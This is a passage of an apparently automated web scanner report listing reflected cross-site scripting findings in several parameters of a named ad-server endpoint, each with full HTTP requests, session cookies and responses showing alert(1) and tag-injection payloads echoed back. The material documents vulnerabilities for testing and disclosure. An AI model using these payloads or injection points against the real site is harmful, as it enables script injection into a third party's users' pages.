User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; surround=f|1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":2,"to":5,"c":"http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka","lc":{"d1":{"v":2,"s":false}},"cd":1,"sd":1,"f":1303946335587}; last_access=1303947378; fsr.a=1303947389291

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:39:40 GMT
Server: Apache/2.2
Content-Length: 1687
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:39:40 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22052%3A22135%3Aeb4d2*/alert(1)//1caa87a39cf&NODE=1&PTYPE=2000&PGUID=Tbiocgq0GW4AAEQFAnQ&DVAR_SESSION=f&DVAR_SUBSESSION=1&cookiesOn=1&DVAR_USER=anon&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=67040581&ADREQ&SP=80&POS=100&cooki
...[SNIP]...

3.597. http://mads.cbssports.com/mac-ad [NCAT parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the NCAT request parameter is copied into the HTML document as plain text between tags. The payload 69c3e<a>683765f613c was submitted in the NCAT parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22408%3A69c3e<a>683765f613c&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=44551744&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:02:45 GMT
Server: Apache/2.2
Content-Length: 608
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:02:45 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22408%3A69c3e<a>683765f613c&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=44551744&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *
...[SNIP]...

3.598. http://mads.cbssports.com/mac-ad [NODE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the NODE request parameter is copied into a JavaScript inline comment. The payload 6bf78*/alert(1)//940883ecfb9 was submitted in the NODE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22052%3A22135%3A&NODE=16bf78*/alert(1)//940883ecfb9&PTYPE=2000&PGUID=Tbiocgq0GW4AAEQFAnQ&DVAR_SESSION=f&DVAR_SUBSESSION=1&cookiesOn=1&DVAR_USER=anon&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=67040581&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; surround=f|1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":2,"to":5,"c":"http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka","lc":{"d1":{"v":2,"s":false}},"cd":1,"sd":1,"f":1303946335587}; last_access=1303947378; fsr.a=1303947389291

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:39:53 GMT
Server: Apache/2.2
Content-Length: 1665
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:39:53 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22052%3A22135%3A&NODE=16bf78*/alert(1)//940883ecfb9&PTYPE=2000&PGUID=Tbiocgq0GW4AAEQFAnQ&DVAR_SESSION=f&DVAR_SUBSESSION=1&cookiesOn=1&DVAR_USER=anon&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=67040581&ADREQ&SP=80&POS=100&cookiesOn=1"
...[SNIP]...

3.599. http://mads.cbssports.com/mac-ad [NODE parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the NODE request parameter is copied into the HTML document as plain text between tags. The payload 1ce75<a>34d677d4a6c was submitted in the NODE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22058%3A22207%3A&NODE=222071ce75<a>34d677d4a6c&PTYPE=2001&PGUID=TbiQ3wq0GVcAACnZCmE&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_EXCLUDE=golf&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=28623258&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/golf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:03:42 GMT
Server: Apache/2.2
Content-Length: 607
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:03:42 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22058%3A22207%3A&NODE=222071ce75<a>34d677d4a6c&PTYPE=2001&PGUID=TbiQ3wq0GVcAACnZCmE&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_EXCLUDE=golf&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=28623258&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM
...[SNIP]...

3.600. http://mads.cbssports.com/mac-ad [PAGESTATE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8fee8'%3balert(1)//e628ce7d05e was submitted in the PAGESTATE parameter. This input was echoed as 8fee8';alert(1)//e628ce7d05e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=8fee8'%3balert(1)//e628ce7d05e&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=44551744&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:00:13 GMT
Server: Apache/2.2
Content-Length: 654
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:00:13 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=8fee8'%3balert(1)//e628ce7d05e&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&
...[SNIP]...
n-US&x-cb=44551744&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='175' PTYPE='2001' NCAT='22072:22408:' CID='' TO BEACON TEXT) */;window.CBSI_PAGESTATE='8fee8';alert(1)//e628ce7d05e';/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw6.cnet.com::1367124288 2011.04.27.22.00.13 *//* MAC T 0.1.1.1 */

3.601. http://mads.cbssports.com/mac-ad [PAGESTATE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript inline comment. The payload a6bf7*/alert(1)//c76547e43ec was submitted in the PAGESTATE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=a6bf7*/alert(1)//c76547e43ec&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=44551744&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:00:15 GMT
Server: Apache/2.2
Content-Length: 652
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:00:15 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=a6bf7*/alert(1)//c76547e43ec&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=44551744&ADR
...[SNIP]...

3.602. http://mads.cbssports.com/mac-ad [PGUID parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the PGUID request parameter is copied into the HTML document as plain text between tags. The payload 49479<a>2905b271c2f was submitted in the PGUID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA49479<a>2905b271c2f&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=44551744&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:04:53 GMT
Server: Apache/2.2
Content-Length: 590
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:04:53 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA49479<a>2905b271c2f&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=44551744&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SI
...[SNIP]...

3.603. http://mads.cbssports.com/mac-ad [PGUID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the PGUID request parameter is copied into a JavaScript inline comment. The payload 947e7*/alert(1)//979c8a7c5ed was submitted in the PGUID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22052%3A22135%3A&NODE=1&PTYPE=2000&PGUID=Tbiocgq0GW4AAEQFAnQ947e7*/alert(1)//979c8a7c5ed&DVAR_SESSION=f&DVAR_SUBSESSION=1&cookiesOn=1&DVAR_USER=anon&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=67040581&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; surround=f|1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":2,"to":5,"c":"http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka","lc":{"d1":{"v":2,"s":false}},"cd":1,"sd":1,"f":1303946335587}; last_access=1303947378; fsr.a=1303947389291

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:40:28 GMT
Server: Apache/2.2
Content-Length: 1668
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:40:28 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22052%3A22135%3A&NODE=1&PTYPE=2000&PGUID=Tbiocgq0GW4AAEQFAnQ947e7*/alert(1)//979c8a7c5ed&DVAR_SESSION=f&DVAR_SUBSESSION=1&cookiesOn=1&DVAR_USER=anon&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=67040581&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!--
...[SNIP]...

3.604. http://mads.cbssports.com/mac-ad [POS parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the POS request parameter is copied into the HTML document as plain text between tags. The payload 3da68<a>511b7d3d029 was submitted in the POS parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22052%3A22135%3A&NODE=1&PTYPE=2000&PGUID=Tbiocgq0GW4AAEQFAnQ&DVAR_SESSION=f&DVAR_SUBSESSION=1&cookiesOn=1&DVAR_USER=anon&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=67040581&ADREQ&SP=80&POS=1003da68<a>511b7d3d029&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; surround=f|1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":2,"to":5,"c":"http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka","lc":{"d1":{"v":2,"s":false}},"cd":1,"sd":1,"f":1303946335587}; last_access=1303947378; fsr.a=1303947389291

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:41:51 GMT
Server: Apache/2.2
Content-Length: 696
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:41:51 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22052%3A22135%3A&NODE=1&PTYPE=2000&PGUID=Tbiocgq0GW4AAEQFAnQ&DVAR_SESSION=f&DVAR_SUBSESSION=1&cookiesOn=1&DVAR_USER=anon&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=67040581&ADREQ&SP=80&POS=1003da68<a>511b7d3d029&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBSSPORTS' BRAND='59' SITE='175' SP='80' CNET-PTYPE='10' POS='1003da68a511b7d3d029' NCAT='22052:22135:' CNET-PARTNER-ID='1' DV
...[SNIP]...

3.605. http://mads.cbssports.com/mac-ad [PTYPE parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the PTYPE request parameter is copied into the HTML document as plain text between tags. The payload 2cfce<a>474b8434578 was submitted in the PTYPE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=20012cfce<a>474b8434578&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=44551744&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:04:18 GMT
Server: Apache/2.2
Content-Length: 606
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:04:18 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=20012cfce<a>474b8434578&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=44551744&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COU
...[SNIP]...

3.606. http://mads.cbssports.com/mac-ad [SITE parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the SITE request parameter is copied into the HTML document as plain text between tags. The payload ef0b7<a>2cce8030397 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175ef0b7<a>2cce8030397&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=44551744&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:00:43 GMT
Server: Apache/2.2
Content-Length: 600
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:00:43 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175ef0b7<a>2cce8030397&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=44551744&ADREQ&beacon
...[SNIP]...

3.607. http://mads.cbssports.com/mac-ad [adfile parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the adfile request parameter is copied into the HTML document as plain text between tags. The payload 93ac9<a>06b8679e39a was submitted in the adfile parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

